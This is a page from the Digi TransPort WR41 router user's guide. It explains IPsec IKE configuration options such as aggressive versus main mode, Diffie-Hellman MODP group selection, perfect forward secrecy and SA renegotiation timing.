Manualshelf

User`s guide

ManualsBrandsDigi ManualsComputer equipmentTransPort WR41
201202203204205206207208209210
204
Aggressive mode was developed to allow the host to identify a remote unit (initiator)
from an ID string rather than from its IP address. This means that it can be used over
the Internet via an ISP that dynamically allocates IP addresses. It also has two other
noticeable differences from main mode. Firstly, it uses fewer messages to complete the
phase 1 exchange (3 compared to 5) and so will execute a little more quickly, particularly
on networks with large turn-around delays such as GPRS. Secondly, as more information
is sent unencrypted during the exchange, it is potentially less secure than a normal mode
exchange.
Note:
Main mode can be used without knowing the remote unit’s IP address when using
certificates. This is because the ID of the remote unit (it’s public key) can be retrieved
from the certificate file.
MODP Group for Phase 1
Sets the key length used in the IKE Diffie-Hellman exchange to768 bits (group 1) or
1024 bits (group 2). Normally this option is set to group 1 and this is sufficient for
normal use. For particularly sensitive applications, you can improve security by selecting
group 2 to enable a 1024 bit key length. Note however that this will slow down the
process of generating the phase 1 session keys (typically from 1-2 seconds for group 1),
to 4-5 seconds.
MODP Group for Phase 2
Sets the minimum width of the numeric field used in the calculations for phase 2 of the
security exchange.
With “No PFS” (Perfect Forwarding Security) selected, the data transferred during phase
1 can be reused to generate the keys for the phase 2 SAs (hence speeding up
connections). However, in doing this it is possible (though very unlikely), that if the
phase 1 keys were compromised (i.e. discovered by a third party), the phase 2 keys
might be more easily compromised.
Enabling group 1 (768) or 2 (1024) or 3 (1536), IPSec MODP forces the key calculation
for phase 2 to use new data that has no relationship to the phase 1 data and initiates a
second Diffie-Hellman exchange. This provides an even greater level of security but of
course can take longer to complete.
Renegotiate after h hrs m mins s secs
Determines how long the initial IKE Security Association will stay in force. When it expires
any attempt to send packets to the remote system will result in IKE attempting to establish
a new SA.